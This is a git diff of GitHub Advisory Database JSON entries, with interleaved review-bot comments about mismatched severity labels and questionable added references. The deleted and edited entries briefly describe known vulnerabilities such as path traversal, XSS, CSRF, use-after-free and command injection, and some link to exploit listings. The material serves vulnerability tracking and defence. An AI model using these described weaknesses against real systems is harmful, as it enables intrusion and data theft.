 "url": "http://git.chromium.org/gitweb/?p=chromiumos/third_party/kernel.git;a=commit;h=c79efdf2b7f68f985922a8272d64269ecd490477"
diff --git a/advisories/unreviewed/2022/05/GHSA-w327-wq28-3vmf/GHSA-w327-wq28-3vmf.json b/advisories/unreviewed/2022/05/GHSA-w327-wq28-3vmf/GHSA-w327-wq28-3vmf.json
deleted file mode 100644
index 5e2266b50ddb4..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-w327-wq28-3vmf/GHSA-w327-wq28-3vmf.json
+++ /dev/null
@@ -1,43 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-w327-wq28-3vmf",
- "modified": "2022-05-02T03:56:59Z",
- "published": "2022-05-02T03:56:59Z",
- "aliases": [
- "CVE-2009-4665"
- ],
- "details": "Directory traversal vulnerability in CuteSoft_Client/CuteEditor/Load.ashx in CuteSoft Components Cute Editor for ASP.NET allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-4665"
- },
- {
- "type": "WEB",
- "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/50727"
- },
- {
- "type": "WEB",
- "url": "http://www.exploit-db.com/exploits/8785"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/35085"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-22"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2010-03-05T18:30:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-w3j5-qjf6-g9gf/GHSA-w3j5-qjf6-g9gf.json b/advisories/unreviewed/2022/05/GHSA-w3j5-qjf6-g9gf/GHSA-w3j5-qjf6-g9gf.json
index d632def9ddfac..0e9a6c79bf5ee 100644
--- a/advisories/unreviewed/2022/05/GHSA-w3j5-qjf6-g9gf/GHSA-w3j5-qjf6-g9gf.json
+++ b/advisories/unreviewed/2022/05/GHSA-w3j5-qjf6-g9gf/GHSA-w3j5-qjf6-g9gf.json
@@ -22,6 +22,10 @@
 "type": "WEB",
 "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11236"
 },
+ {
+ "type": "WEB",
+ "url": "http://linux.bkbits.net:8080/linux-2.6/cset%4043483fddCiQX1WyG_orbko06TrjMVA"
+ },
 {
 "type": "WEB",
 "url": "http://linux.bkbits.net:8080/linux-2.6/cset@43483fddCiQX1WyG_orbko06TrjMVA"
@@ -45,7 +49,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-401"
 ],
 "severity": "LOW",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-w3mr-x868-44rj/GHSA-w3mr-x868-44rj.json b/advisories/unreviewed/2022/05/GHSA-w3mr-x868-44rj/GHSA-w3mr-x868-44rj.json index 2a939430c4654..43ae937e2e85b 100644 --- a/advisories/unreviewed/2022/05/GHSA-w3mr-x868-44rj/GHSA-w3mr-x868-44rj.json +++ b/advisories/unreviewed/2022/05/GHSA-w3mr-x868-44rj/GHSA-w3mr-x868-44rj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-w3mr-x868-44rj", - "modified": "2022-05-17T02:18:26Z", + "modified": "2024-02-02T18:30:20Z", "published": "2022-05-17T02:18:26Z", "aliases": [ "CVE-2008-5038" ], "details": "Use-after-free vulnerability in the NetWare Core Protocol (NCP) feature in Novell eDirectory 8.7.3 SP10 before 8.7.3 SP10 FTF1 and 8.8 SP2 for Windows allows remote attackers to cause a denial of service and possibly execute arbitrary code via a sequence of \"Get NCP Extension Information By Name\" requests that cause one thread to operate on memory after it has been freed in another thread, which triggers memory corruption, aka Novell Bug 373852.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -61,7 +64,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-w55x-q3gv-px85/GHSA-w55x-q3gv-px85.json b/advisories/unreviewed/2022/05/GHSA-w55x-q3gv-px85/GHSA-w55x-q3gv-px85.json deleted file mode 100644 index 0effb7c3ec4c7..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-w55x-q3gv-px85/GHSA-w55x-q3gv-px85.json +++ /dev/null 
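Review bot: The CVSS vector added to GHSA-w3mr-x868-44rj (`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`) has base score 9.8, yet the pre-existing `"severity": "HIGH"` in the second hunk of the same file is left untouched; if that label is meant to track the vector it now belongs in the CRITICAL band (9.0–10.0). The same score/label drift appears in GHSA-whx8-pphh-55mv (new vector scores 5.5, label stays `"LOW"`), GHSA-wvg9-27w3-xhh7 (6.7, label stays `"HIGH"`) and GHSA-wx39-gwc4-8cjf (7.5, label stays `"MODERATE"`). Either recompute `database_specific.severity` from the new vector in the same change, or document that the label is an independent upstream field so consumers do not assume the two agree.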
@@ -1,43 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-w55x-q3gv-px85",
- "modified": "2022-05-24T22:01:18Z",
- "published": "2022-05-24T22:01:18Z",
- "aliases": [
- "CVE-2018-17572"
- ],
- "summary": "Cross-site Scripting in InfluxDB",
- "details": "InfluxDB 0.9.5 has Reflected XSS in the Write Data module.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-17572"
- },
- {
- "type": "WEB",
- "url": "https://gist.github.com/Raghavrao29/1cb84f1f2d8ce993fd7b2d1366d35f48"
- },
- {
- "type": "WEB",
- "url": "https://github.com/influxdata/influxdb/releases/tag/v0.9.6"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2020-03-02T20:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-w5vh-2923-gp5c/GHSA-w5vh-2923-gp5c.json b/advisories/unreviewed/2022/05/GHSA-w5vh-2923-gp5c/GHSA-w5vh-2923-gp5c.json
index d088825e14858..a15c4874cf3e3 100644
--- a/advisories/unreviewed/2022/05/GHSA-w5vh-2923-gp5c/GHSA-w5vh-2923-gp5c.json
+++ b/advisories/unreviewed/2022/05/GHSA-w5vh-2923-gp5c/GHSA-w5vh-2923-gp5c.json
@@ -29,6 +29,14 @@
 "type": "WEB",
 "url": "https://lists.debian.org/debian-lts-announce/2021/01/msg00022.html"
 },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CALA5FTXIQBRRYUA2ZQNJXB6OQMAXEII/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LHXK6ICO5AYLGFK2TAX5MZKUXTUKWOJY/"
+ },
 {
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CALA5FTXIQBRRYUA2ZQNJXB6OQMAXEII/"
@@ -109,6 +117,10 @@
 "type": "WEB",
 "url": "http://packetstormsecurity.com/files/161293/Sudo-1.8.31p2-1.9.5p1-Buffer-Overflow.html"
 },
+ {
+ "type": "WEB",
+ "url": "http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html"
+ },
 {
 "type": "WEB",
 "url": "http://seclists.org/fulldisclosure/2021/Feb/42"
@@ -117,6 +129,10 @@
 "type": "WEB",
 "url": "http://seclists.org/fulldisclosure/2021/Jan/79"
 },
+ {
+ "type": "WEB",
+ "url": "http://seclists.org/fulldisclosure/2024/Feb/3"
+ },
 {
 "type": "WEB",
 "url": "http://www.openwall.com/lists/oss-security/2021/01/26/3"
@@ -136,6 +152,14 @@
 {
 "type": "WEB",
 "url": "http://www.openwall.com/lists/oss-security/2021/09/14/2"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2024/01/30/6"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2024/01/30/8"
+ }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2022/05/GHSA-w736-qv86-vq94/GHSA-w736-qv86-vq94.json b/advisories/unreviewed/2022/05/GHSA-w736-qv86-vq94/GHSA-w736-qv86-vq94.json
deleted file mode 100644
index c7d8f667b414d..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-w736-qv86-vq94/GHSA-w736-qv86-vq94.json
+++ /dev/null
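Review bot: The four references added to GHSA-w5vh-2923-gp5c across these hunks (`176932/glibc-syslog-Heap-Based-Buffer-Overflow.html`, `fulldisclosure/2024/Feb/3`, `oss-security/2024/01/30/6` and `/8`) point at a 2024 glibc syslog issue, while every existing reference in the file (the `Sudo-1.8.31p2-1.9.5p1-Buffer-Overflow` write-up and the January 2021 Debian, Fedora, full-disclosure and oss-security threads) concerns a 2021 sudo bug. They look like they were pulled in because the 2024 posts cite this older advisory rather than because they document it; that is inferred from the URLs alone, so it is worth confirming against the advisory's CVE before merging, since off-topic references make triage noisier for anyone tracking the entry. The enclosing `references` array begins before the first hunk.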
@@ -1,51 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-w736-qv86-vq94", - "modified": "2022-05-17T05:28:57Z", - "published": "2022-05-17T05:28:57Z", - "aliases": [ - "CVE-2010-3714" - ], - "details": "The jumpUrl (aka access tracking) implementation in tslib/class.tslib_fe.php in TYPO3 4.2.x before 4.2.15, 4.3.x before 4.3.7, and 4.4.x before 4.4.4 does not properly compare certain hash values during access-control decisions, which allows remote attackers to read arbitrary files via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3714" - }, - { - "type": "WEB", - "url": "http://blog.nibblesec.org/2010/12/typo3-sa-2010-020-typo3-sa-2010-022.html" - }, - { - "type": "WEB", - "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020/" - }, - { - "type": "WEB", - "url": "http://www.debian.org/security/2010/dsa-2121" - }, - { - "type": "WEB", - "url": "http://www.exploit-db.com/exploits/15856" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/43786" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-10-25T20:01:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-wg7x-vf54-9qjw/GHSA-wg7x-vf54-9qjw.json b/advisories/unreviewed/2022/05/GHSA-wg7x-vf54-9qjw/GHSA-wg7x-vf54-9qjw.json deleted file mode 100644 index c54ba126e3872..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-wg7x-vf54-9qjw/GHSA-wg7x-vf54-9qjw.json +++ /dev/null 
@@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-wg7x-vf54-9qjw", - "modified": "2022-05-13T01:25:43Z", - "published": "2022-05-13T01:25:43Z", - "aliases": [ - "CVE-2019-1003058" - ], - "details": "A cross-site request forgery vulnerability in Jenkins FTP publisher Plugin in the FTPPublisher.DescriptorImpl#doLoginCheck method allows attackers to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003058" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-974" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-whcg-2364-672f/GHSA-whcg-2364-672f.json b/advisories/unreviewed/2022/05/GHSA-whcg-2364-672f/GHSA-whcg-2364-672f.json deleted file mode 100644 index f38df909baefd..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-whcg-2364-672f/GHSA-whcg-2364-672f.json +++ /dev/null 
@@ -1,46 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-whcg-2364-672f",
- "modified": "2022-05-13T01:15:02Z",
- "published": "2022-05-13T01:15:02Z",
- "aliases": [
- "CVE-2019-10290"
- ],
- "details": "A missing permission check in Jenkins Netsparker Cloud Scan Plugin 1.1.5 and older in the NCScanBuilder.DescriptorImpl#doValidateAPI form validation method allowed attackers with Overall/Read permission to initiate a connection to an attacker-specified server.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10290"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1032"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/107790"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-862"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-04-04T16:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-whgj-f82x-p3xc/GHSA-whgj-f82x-p3xc.json b/advisories/unreviewed/2022/05/GHSA-whgj-f82x-p3xc/GHSA-whgj-f82x-p3xc.json
index b5f5d6d93a903..c02ab05e83508 100644
--- a/advisories/unreviewed/2022/05/GHSA-whgj-f82x-p3xc/GHSA-whgj-f82x-p3xc.json
+++ b/advisories/unreviewed/2022/05/GHSA-whgj-f82x-p3xc/GHSA-whgj-f82x-p3xc.json
@@ -53,7 +53,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-770"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-whx8-pphh-55mv/GHSA-whx8-pphh-55mv.json b/advisories/unreviewed/2022/05/GHSA-whx8-pphh-55mv/GHSA-whx8-pphh-55mv.json
index b120d9f815f83..eaade1d21bbf6 100644
--- a/advisories/unreviewed/2022/05/GHSA-whx8-pphh-55mv/GHSA-whx8-pphh-55mv.json
+++ b/advisories/unreviewed/2022/05/GHSA-whx8-pphh-55mv/GHSA-whx8-pphh-55mv.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-whx8-pphh-55mv", - "modified": "2022-05-01T02:06:57Z", + "modified": "2024-02-08T21:30:31Z", "published": "2022-05-01T02:06:57Z", "aliases": [ "CVE-2005-2293" ], "details": "Oracle Formsbuilder 9.0.4 stores database usernames and passwords in a temporary file, which is not deleted after it is used, which allows local users to obtain sensitive information.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -41,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-459" ], "severity": "LOW", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-wmq3-24jm-m8xh/GHSA-wmq3-24jm-m8xh.json b/advisories/unreviewed/2022/05/GHSA-wmq3-24jm-m8xh/GHSA-wmq3-24jm-m8xh.json deleted file mode 100644 index b1f76e57cfa69..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-wmq3-24jm-m8xh/GHSA-wmq3-24jm-m8xh.json +++ /dev/null 
@@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-wmq3-24jm-m8xh", - "modified": "2022-05-13T01:15:01Z", - "published": "2022-05-13T01:15:01Z", - "aliases": [ - "CVE-2019-10280" - ], - "details": "Jenkins Assembla Auth Plugin stores credentials unencrypted in the global config.xml configuration file on the Jenkins master where they can be viewed by users with access to the master file system.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10280" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1093" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-522" - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-wp79-cpv2-9g7m/GHSA-wp79-cpv2-9g7m.json b/advisories/unreviewed/2022/05/GHSA-wp79-cpv2-9g7m/GHSA-wp79-cpv2-9g7m.json deleted file mode 100644 index 42af4ecab7b4b..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-wp79-cpv2-9g7m/GHSA-wp79-cpv2-9g7m.json +++ /dev/null 
@@ -1,38 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-wp79-cpv2-9g7m",
- "modified": "2022-05-14T03:45:21Z",
- "published": "2022-05-14T03:45:21Z",
- "aliases": [
- "CVE-2017-1000502"
- ],
- "details": "Users with permission to create or configure agents in Jenkins 1.37 and earlier could configure an EC2 agent to run arbitrary shell commands on the master node whenever the agent was supposed to be launched. Configuration of these agents now requires the 'Run Scripts' permission typically only granted to administrators.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000502"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2017-12-06/"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-78"
- ],
- "severity": "HIGH",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2018-01-24T23:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-wpp8-x44c-v39q/GHSA-wpp8-x44c-v39q.json b/advisories/unreviewed/2022/05/GHSA-wpp8-x44c-v39q/GHSA-wpp8-x44c-v39q.json
index 94e6cfaec6dc6..14b13374a1eef 100644
--- a/advisories/unreviewed/2022/05/GHSA-wpp8-x44c-v39q/GHSA-wpp8-x44c-v39q.json
+++ b/advisories/unreviewed/2022/05/GHSA-wpp8-x44c-v39q/GHSA-wpp8-x44c-v39q.json
@@ -49,7 +49,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-862"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-wqq5-c89p-3wc3/GHSA-wqq5-c89p-3wc3.json b/advisories/unreviewed/2022/05/GHSA-wqq5-c89p-3wc3/GHSA-wqq5-c89p-3wc3.json
deleted file mode 100644
index b9a9070157235..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-wqq5-c89p-3wc3/GHSA-wqq5-c89p-3wc3.json
+++ /dev/null
@@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-wqq5-c89p-3wc3", - "modified": "2022-05-17T19:57:30Z", - "published": "2022-05-17T19:57:30Z", - "aliases": [ - "CVE-2014-4966" - ], - "details": "Ansible before 1.6.7 does not prevent inventory data with "{{" and "lookup" substrings, and does not prevent remote data with "{{" substrings, which allows remote attackers to execute arbitrary code via (1) crafted lookup('pipe') calls or (2) crafted Jinja2 data.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-4966" - }, - { - "type": "WEB", - "url": "https://github.com/ansible/ansible/commit/62a1295a3e08cb6c3e9f1b2a1e6e5dcaeab32527" - }, - { - "type": "WEB", - "url": "http://www.ocert.org/advisories/ocert-2014-004.html" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-02-18T15:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-wrr5-p265-7252/GHSA-wrr5-p265-7252.json b/advisories/unreviewed/2022/05/GHSA-wrr5-p265-7252/GHSA-wrr5-p265-7252.json deleted file mode 100644 index 72027827c04c1..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-wrr5-p265-7252/GHSA-wrr5-p265-7252.json +++ /dev/null 
@@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-wrr5-p265-7252", - "modified": "2023-10-25T18:31:21Z", - "published": "2022-05-24T22:00:03Z", - "aliases": [ - "CVE-2019-10325" - ], - "details": "A cross-site scripting vulnerability in Jenkins Warnings NG Plugin 5.0.0 and earlier allowed attacker with Job/Configure permission to inject arbitrary JavaScript in build overview pages.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10325" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-05-31/#SECURITY-1373" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/05/31/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/108540" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-05-31T15:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-wvg9-27w3-xhh7/GHSA-wvg9-27w3-xhh7.json b/advisories/unreviewed/2022/05/GHSA-wvg9-27w3-xhh7/GHSA-wvg9-27w3-xhh7.json index 4ab4baca2cd02..cbcce8c19d37a 100644 --- a/advisories/unreviewed/2022/05/GHSA-wvg9-27w3-xhh7/GHSA-wvg9-27w3-xhh7.json +++ b/advisories/unreviewed/2022/05/GHSA-wvg9-27w3-xhh7/GHSA-wvg9-27w3-xhh7.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-wvg9-27w3-xhh7", - "modified": "2022-05-24T17:17:10Z", + "modified": "2024-02-01T03:30:23Z", "published": "2022-05-24T17:17:10Z", "aliases": [ "CVE-2020-12659" ], "details": "An issue was discovered in the Linux kernel before 5.6.7. xdp_umem_reg in net/xdp/xdp_umem.c has an out-of-bounds write (by a user with the CAP_NET_ADMIN capability) because of a lack of headroom validation.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -57,7 +60,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-wvr4-w6cw-4px8/GHSA-wvr4-w6cw-4px8.json b/advisories/unreviewed/2022/05/GHSA-wvr4-w6cw-4px8/GHSA-wvr4-w6cw-4px8.json deleted file mode 100644 index 91bfa3daa56d0..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-wvr4-w6cw-4px8/GHSA-wvr4-w6cw-4px8.json +++ /dev/null @@ -1,35 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-wvr4-w6cw-4px8", - "modified": "2022-05-24T16:59:48Z", - "published": "2022-05-24T16:59:48Z", - "aliases": [ - "CVE-2019-15929" - ], - "details": "In Craft CMS through 3.1.7, the elevated session password prompt was not being rate limited like normal login forms, leading to the possibility of a brute force attempt on them.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-15929" - }, - { - "type": "WEB", - "url": "https://github.com/craftcms/cms/blob/develop/CHANGELOG-v3.md#317---2019-01-31" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-10-24T16:15:00Z" - } -} \ No newline at end of file 
diff --git a/advisories/unreviewed/2022/05/GHSA-wwrr-4jp4-58wg/GHSA-wwrr-4jp4-58wg.json b/advisories/unreviewed/2022/05/GHSA-wwrr-4jp4-58wg/GHSA-wwrr-4jp4-58wg.json deleted file mode 100644 index 406a1737e25d3..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-wwrr-4jp4-58wg/GHSA-wwrr-4jp4-58wg.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-wwrr-4jp4-58wg", - "modified": "2023-10-25T18:31:32Z", - "published": "2022-05-24T17:03:48Z", - "aliases": [ - "CVE-2019-16569" - ], - "details": "A cross-site request forgery vulnerability in Jenkins Mantis Plugin 0.26 and earlier allows attackers to connect to an attacker-specified web server using attacker-specified credentials.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16569" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-12-17/#SECURITY-1603" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/12/17/1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-12-17T15:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-www7-pq67-9w24/GHSA-www7-pq67-9w24.json b/advisories/unreviewed/2022/05/GHSA-www7-pq67-9w24/GHSA-www7-pq67-9w24.json index 4e1e43e3c56b1..2096fdfc15e1e 100644 --- a/advisories/unreviewed/2022/05/GHSA-www7-pq67-9w24/GHSA-www7-pq67-9w24.json +++ b/advisories/unreviewed/2022/05/GHSA-www7-pq67-9w24/GHSA-www7-pq67-9w24.json 
@@ -22,94 +22,186 @@ "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/39472" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/54a42d4b01968df1117cea77fc53d6beb931c0e05936ad02af93e9ac%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/54a42d4b01968df1117cea77fc53d6beb931c0e05936ad02af93e9ac@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/5df9bfb86a3b054bb985a45ff9250b0332c9ecc181eec232489e7f79%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5df9bfb86a3b054bb985a45ff9250b0332c9ecc181eec232489e7f79@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/f7f95ac1cd9895db2714fa3ebaa0b94d0c6df360f742a40951384a53%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f7f95ac1cd9895db2714fa3ebaa0b94d0c6df360f742a40951384a53@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r0276683d8e1e07153fc8642618830ac0ade85b9ae0dc7b07f63bb8fc%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0276683d8e1e07153fc8642618830ac0ade85b9ae0dc7b07f63bb8fc@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread.html/r2cb985de917e7da0848c440535f65a247754db8b2154a10089e4247b%40%3Ccvs.httpd.apache.org%3E" + }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2cb985de917e7da0848c440535f65a247754db8b2154a10089e4247b@%3Ccvs.httpd.apache.org%3E" }, + { + "type": "WEB", + 
